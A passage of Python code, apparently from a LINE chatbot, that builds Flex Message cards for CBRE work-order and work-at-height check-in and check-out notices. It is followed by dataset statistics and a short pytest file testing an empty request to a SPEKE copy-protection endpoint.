"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MangementName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": management,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "TypeOfJob :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": type_job,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JLA/RAReviewed :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": jla_ra,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkerInvolved ? : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": any_ssw,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Observation ? :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": physical,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Remarks :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": remark,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CheckIn Time :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
arry_contants.append(contents_submit_wah)
return data_wah
def linedetailcheck (detail_checkin,type):
if type == 'completed' :
for I in detail_checkin :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {
"type": "flex",
"altText": "Flex Message",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "รายละเอียดของงาน",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "ผู้รับเหมา :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "เลขแจ้งซ่อม :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "สถานี :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "รายละเอียดงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "ช่างที่เข้าทำงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_startwork,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "เบอร์โทรช่าง :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "วันที่เข้าจบงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
}
return data
if type == 'onsite' :
for I in detail_checkin :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {
"type": "flex",
"altText": "Flex Message",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "รายละเอียดของงาน",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "ผู้รับเหมา :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "เลขแจ้งซ่อม :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "สถานี :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "รายละเอียดงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "ช่างที่เข้าทำงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_startwork,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "เบอร์โทรช่าง :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "วันที่เข้าทำงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
}
return data
if type == 'admin2' :
for I in detail_checkin :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_completedwork = I.fls_completedwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {
"type": "flex",
"altText": "Flex Message",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "CHECKOUT WAH NOTIFY",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Contractor :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "PlanedDate :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(planned_date),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkOrder :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "SiteName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JobDescriptions :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName CheckIn :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_startwork,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName CheckOut :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_completedwork,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MobilePhoneFLS :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MangementName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": management,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "TypeOfJob :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": type_job,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JLA/RAReviewed :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": jla_ra,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkerInvolved ? : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": any_ssw,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Observation ? :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": physical,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Remarks :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": remark,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CheckIn Time",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CheckOut Time",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(completedwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
}
return data
print("OK")
if type == 'admin' :
for I in detail_checkin :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {
"type": "flex",
"altText": "Flex Message",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "CHECK IN WAH NOTIFY",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Contractor :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "PlanedDate :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(planned_date),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkOrder :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "SiteName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JobDescriptions :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_mame,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MobilePhoneFLS :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MangementName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": management,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "TypeOfJob :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": type_job,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JLA/RAReviewed :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": jla_ra,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkerInvolved ? : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": any_ssw,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Observation ? :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": physical,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Remarks :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": remark,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CheckIn Time",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
}
return data
print("OK")
| 40.32746
| 92
| 0.21666
| 5,242
| 121,305
| 4.952499
| 0.039107
| 0.121105
| 0.081353
| 0.134818
| 0.95135
| 0.943454
| 0.939294
| 0.936559
| 0.934325
| 0.929163
| 0
| 0.026973
| 0.67543
| 121,305
| 3,008
| 93
| 40.32746
| 0.631413
| 0.019909
| 0
| 0.744523
| 0
| 0
| 0.157397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002474
| false
| 0
| 0.000353
| 0
| 0.007067
| 0.015901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b46aa8e9e4eb998d9503b642f6bf1e79e4978c60
| 5,914
|
py
|
Python
|
tests/test_app.py
|
t-kigi/speke-chalice
|
b737d238dcccb6922c62a7a91ce6d4da208282bc
|
[
"Apache-2.0"
] | null | null | null |
tests/test_app.py
|
t-kigi/speke-chalice
|
b737d238dcccb6922c62a7a91ce6d4da208282bc
|
[
"Apache-2.0"
] | null | null | null |
tests/test_app.py
|
t-kigi/speke-chalice
|
b737d238dcccb6922c62a7a91ce6d4da208282bc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from unittest.mock import MagicMock, patch
import app as target
def test_empty_request():
""" 入力なしで API が呼ばれた場合のテスト """
target.app.current_request = MagicMock(raw_body=b'')
with patch('os.environ') as menv:
menv.get.return_value = '81376844-f976-481e-a84e-cc25d39b0b33'
res = target.copy_protection().to_dict()
assert res['statusCode'] == 500
assert 'no element found' in res['body'].decode()
